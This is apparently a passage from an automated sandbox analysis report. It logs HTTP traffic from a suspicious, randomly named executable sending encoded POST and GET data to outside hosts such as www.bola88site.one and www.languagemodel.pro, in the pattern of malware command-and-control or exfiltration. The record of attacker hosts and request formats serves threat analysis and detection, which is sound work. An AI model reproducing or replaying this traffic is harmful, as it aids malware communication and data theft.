                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.553624172.96.191.39801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:51.405745983 CEST842OUTPOST /3qit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Origin: http://www.bola88site.one
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.bola88site.one/3qit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 2f 49 49 71 4e 4d 67 61 66 38 45 69 30 69 2f 49 4a 47 31 56 74 6f 76 69 31 4d 36 51 62 4f 34 65 33 51 66 6a 4d 7a
                                                        Data Ascii: x0wHoJ8X=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+x/IIqNMgaf8Ei0i/IJG1Vtovi1M6QbO4e3QfjMz
                                                        Sep 18, 2024 16:18:52.296257973 CEST1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:52 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.553625172.96.191.39801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:54.002728939 CEST1859OUTPOST /3qit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Origin: http://www.bola88site.one
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.bola88site.one/3qit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 42 39 78 6c 4b 4c 50 67 52 44 6a 68 54 43 4e 34 46 5a 31 4f 58 5a 4c 51 77 31 77 4c 70 68 78 6e 42 37 6d 47 52 31 79 42 61 58 6b 61 62 4c 64 57 52 4a 6b 50 52 36 77 7a 58 52 77 6f 48 4d 52 41 65 65 30 4b 4b 65 58 76 61 39 7a 53 43 30 63 44 38 56 65 79 6a 6e 35 4d 70 4c 50 62 61 52 74 34 63 5a 39 34 6d 2b 56 6a 53 74 4c 46 7a 6c 6e 50 75 61 6e 6e 52 59 62 2f 67 36 39 4a 57 2f 4c 5a 49 6a 65 6b 4d 43 63 51 75 5a 41 48 39 6a 76 58 69 33 30 58 4a 2b 64 59 4d 69 6d 4c 38 69 58 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjfB9xlKLPgRDjhTCN4FZ1OXZLQw1wLphxnB7mGR1yBaXkabLdWRJkPR6wzXRwoHMRAee0KKeXva9zSC0cD8Veyjn5MpLPbaRt4cZ94m+VjStLFzlnPuannRYb/g69JW/LZIjekMCcQuZAH9jvXi30XJ+dYMimL8iXolwv+EOvZ+HWPrk4Zz418ft4p6SI4tZKOO0YAl6L/b5yTKqstQNd4buwdKddOELFA7FnNL8YY47F1XOCiu9vyj7lB8ciD7293oepaGLHdceG/VXeThtP6bt0jmPFRuLwVTj7B6CVguWnc3eYUzl+cu1m12YP11ICmcO9vQy2JKJTZQnlRHEleP215GqeuDw5+eikEBHv5tjssFATnkxe+IQ4ZPdliR2V8JEfxInLSG2EaDO1ThOpxKK2snU+7o2N+FfzyLO/p9F2yvl0JIOXz8GD97DUJWf3JDrTN7pH0jPmDt7mXewVQOx3oU2PN05W/fPBJrne3s3ym+2UU8LHcQQhsd9cTLlkH4L74OvcAH2ZykYNYZesnfWmBTCFIFKW0b+31mNgEtZS6dXINEZezQcaJ8xs7yVT2nwPfMQ3bqkhucWfeQJ5oAjvQQJDtOhNCUSzZQR+sJQirvTcCR4pnoHSmHZDB2NKtTwpPLHu7wZV3NtRent5L3KZI3/7XTNyut6vxFPRGE43wfCd64cNqOmYKtHN7W53YdVoN6EvslsdXMVZ5n76HJMaQowvGk5ZHgbZWz9ZZEJn/3HejnB7tEM5hsmE7UaOcaLx23t35oaUCr/WvWT7M3eXSC5ZoS//01llxHHmY26te5WpQuF1TIHUk8qt5UD9gU [TRUNCATED]
                                                        Sep 18, 2024 16:18:54.881388903 CEST1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:54 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.553626172.96.191.39801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:56.536655903 CEST563OUTGET /3qit/?x0wHoJ8X=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYdT0P+5RUfPK3QBy2V8RIR3qX5RHElk5NoP1SAVBTInHq3g==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:57.440395117 CEST1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:57 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.553627217.70.184.50801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:02.632920980 CEST831OUTPOST /nxfn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Origin: http://www.languagemodel.pro
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 6e 35 72 76 59 52 31 38 35 5a 61 38 35 31 52 65 75 39 55 67 44 57 37 69 6c 33 39 5a 43 54 56 34 64 55 4c 63 5a 77 3d
                                                        Data Ascii: x0wHoJ8X=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdn5rvYR185Za851Reu9UgDW7il39ZCTV4dULcZw=
                                                        Sep 18, 2024 16:19:03.210390091 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:03 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.553628217.70.184.50801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:05.179414034 CEST851OUTPOST /nxfn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Origin: http://www.languagemodel.pro
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 36 44 79 32 2f 4b 49 79 79 38 69 2b 45 37 43 4f 6c 61 54 4e 58 72 68 57 6d 4c 55 68 6e 41 78 78 31 73 71 35 4a 2b
                                                        Data Ascii: x0wHoJ8X=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj6Dy2/KIyy8i+E7COlaTNXrhWmLUhnAxx1sq5J+
                                                        Sep 18, 2024 16:19:05.791811943 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:05 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.553629217.70.184.50801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:07.730180979 CEST1868OUTPOST /nxfn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Origin: http://www.languagemodel.pro
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
